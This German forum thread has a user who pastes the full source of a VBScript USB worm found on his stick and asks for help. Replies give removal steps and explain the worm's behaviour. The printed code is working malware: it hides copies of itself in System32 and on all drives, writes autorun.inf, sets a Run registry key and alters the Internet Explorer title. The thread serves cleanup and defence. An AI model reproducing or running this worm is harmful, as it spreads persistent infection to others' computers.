War heute an einen fremden Computer und habe mir folgenden unsichbare VBS mit auf meine USB-stick bekommen(hier der Code):

'Mutation of Trojan virus.
'My name is Datei.vbs
On error resume next
Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,che ck,sd,oldname,newname,rgname
Set fs = createobject("Scripting.FileSystemObject")
Set wn = WScript.CreateObject("WScript.Network")
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname ))
newname = wn.ComputerName & ".vbs"
rgname = Replace(newname,".vbs","")
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe Datei.vbs"
dim text,size
size = mf.size
check = mf.drive.drivetype
Set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
Loop
mysource=Replace(mysource,oldname,newname)
do
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 32
Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true)
tf.write mysource
tf.close
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 39
For each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" Then
Set tf=fs.getfile(flashdrive.path &"\Datei01.vbs")
tf.attributes =32
Set tf=fs.createtextfile(flashdrive.path &"\Datei01.vbs",2,true)
tf.write mysource
tf.close
Set tf=fs.getfile(flashdrive.path &"\Datei01.vbs")
tf.attributes =39
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
End If
next
Set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname, ".vbs","")
if check <> 1 then
Wscript.sleep 120000
End if
loop while check<>1
Set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Also kann mir mal jemand kurz erzählen wie ich das Ding wieder loskrieg. Meine Virensoftware hat nicht angeschlagen, daher denke ich mal das es über die Autorun.inf ausgeführt wurde, nachdem ich den Stick an meine PC gemacht habe.

1. Vorerst keine USB-Sticks und -Platten an den Rechner anschließen, eventuell angeschlossene trennen.

2. Im Explorer im Menü Extras -> Ordneroptionen -> Ansicht setze folgende Einstellungen:

Erweiterungen bei bekannten Dateitypen ausblenden -> Haken weg
Geschützte Systemdateien ausblenden -> Haken weg
Inhalte von Systemordnern anzeigen -> Haken setzen (diese Option ist bei Windows 2000 nicht vorhanden)
Versteckte Dateien und Ordner -> Alle Dateien und Ordner anzeigen


3. Taskmanager: alle laufenden Prozesse wscript.exe bzw. cscript.exe beenden.

4. Die schon erkannte VBS-Datei löschen.

5. Deine Festplatten nach Dateien mit dme Namen autorun.inf absuchen. Dabei drauf achten, dass alles durchsucht wird, "weitere Optionen" entsprechend setzen. Die ebenfalls löschen.

6. Mit Hijackthis eben nach der besagten vbs Datei suchen und entfernen

7. Damit sollte der Rechner selber erledigt sein, nun kommen die USB-Laufwerke dran. Um beim Anschluss eine Neuinfektion zu verhindern, die Shift-Taste gedrückt halten, das verhindert den Autorun. Zusätzlich kannst Du auch vorher in system32 die wscript.exe umbenennen, das aber am Ende wieder rückgängig machen, sie ist ein wichtiger Teil von Windows.

8. Auf allen USB-Geräten nun nach Kopien dieser vbs-Datei und autorun.inf-Dateien suchen und die ebenfalls löschen. dabei ebenfalls die Suchoptionen beachten.

Wie geil ist das denn, xD

Genau diesen VBS "Wurm" durfte ich seinerzeit ca. 100x von i-welchen Festplatten und USB Sticks löschen, weil i-ein Hornoxe auf die Idee gekommen ist, ihn auf den offenen Schulrechnern zu starten

Mal abgesehen davon, dass der sich bei jedem Starten in den System32 und auf jeden externen Datenträger kopiert, schreibt er sich auch noch in den Autostart bzw. in die Autostart.ini, der jeweiligen Partition

Und nun kommt die Hauptaufgabe: Der Titelleiste des InternetExplorers folgendes anhängen:
"- Hacked by [Ehemaliger PC Name]"

Lösche einfach die neusten VBS Dateien im Sys32 Ordner, sowie die unsichtbare Datei auf all deinen Partitionen, also auch C:,D: und allen USB Sticks, zudem müsste ein reg. Eintrag unter "..\CurrentVersion\Run" existieren

Zuletzt noch unter:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\
den Eintrag:

Window Title
löschen und fertig ist das ganze

Ok danke.
Bis auf Hijackthis habe ich schon alles gemacht.
War vorhin einfach nur erschrocken, das ich eine vbs datei drauf habe und keine Zeit. Also danke für die Hilfe.

Edit: Ok war doch nur auf den USB-Stick, habe nichts im System gefunden. habe jetzt zweimal gesucht.